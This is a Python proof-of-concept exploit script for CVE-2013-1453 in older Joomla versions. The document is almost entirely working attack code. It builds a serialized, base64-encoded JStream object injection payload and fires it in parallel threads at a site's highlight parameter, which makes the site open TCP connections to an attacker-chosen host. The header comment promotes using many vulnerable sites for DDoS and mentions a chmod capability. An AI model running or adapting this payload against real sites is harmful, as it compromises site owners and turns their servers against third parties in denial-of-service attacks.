#!/usr/bin/python
#
# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener
#
# Vendor homepage: www.joomla.org                               ,'
# Versions affected: <=2.5.8, <=3.0.2                                ,'        
# Created: 2012-12-08                                 .,.        ,'
# Public disclosure: 2013-02-04                     .`.`.`.  ,'       ,'
# CVE: CVE-2013-1453                               .`.`.`.`.   ,'  ,'
#                                                  .`.`.`.`.
# Joomla core plugin 'highlight' unserializes      .`.`.`.`.  ,'     ,'
# not trusted input. Plugin is enabled by           \\`.`.`.      ,'
# default in standard joomla installation.           /\.,.   ,'     ,'
#                                                   /
# This proof of concept exploit uses JStream        :
# joomla class to make target opens remote tcp      :
# connections to custom address, therefore         /
# multiple vulnerable joomla instances can be     "
# used for ddos attacks.
#
# (JStream class can also be used to execute chmod on any file with any mode)
#
# Author: Marcin "redeemer" Probola
#
import threading
import datetime
import base64
import httplib
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-H","--host",dest="host", help="Host with vulnerable joomla instance", default="localhost")
parser.add_option("-C","--connect",dest="connectHost", help="Make connection to (in format HOST:PORT)", default="localhost:80")
parser.add_option("-T","--threads",dest="threads", help="number of threads", default=1)
(options, args) = parser.parse_args()

# vars
host = options.host
connectHost = options.connectHost
threads = int(options.threads)

# prepare serialized content
serializedTemplate = 'O:7:"JStream":14:{s:11:"\0*\0filemode";i:438;s:10:"\0*\0dirmode";i:493;s:12:"\0*\0chunksize";i:8192;s:11:"\0*\0filename";s:%d:"%s";s:14:"\0*\0writeprefix";s:0:"";s:13:"\0*\0readprefix";s:0:"";s:19:"\0*\0processingmethod";s:1:"f";s:10:"\0*\0filters";a:0:{}s:6:"\0*\0_fh";s:1:"1";s:12:"\0*\0_filesize";N;s:11:"\0*\0_context";N;s:18:"\0*\0_contextOptions";a:0:{}s:12:"\0*\0_openmode";s:1:"w";s:10:"\0*\0_errors";a:0:{}}'
ftpConnectUrl = "ftp://u:p@" + connectHost + "/s"
serializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )

# thread class - blow (make http request)
class ThreadClass(threading.Thread):
	def run(self):
		conn = httplib.HTTPConnection(host)
		conn.connect()
		conn.request("GET", "/?highlight="+serializedBase64)

print host + " connect(" +str(threads)+") to " + connectHost + "\n"

# run threads
for i in range(threads):
	t = ThreadClass()
	t.start()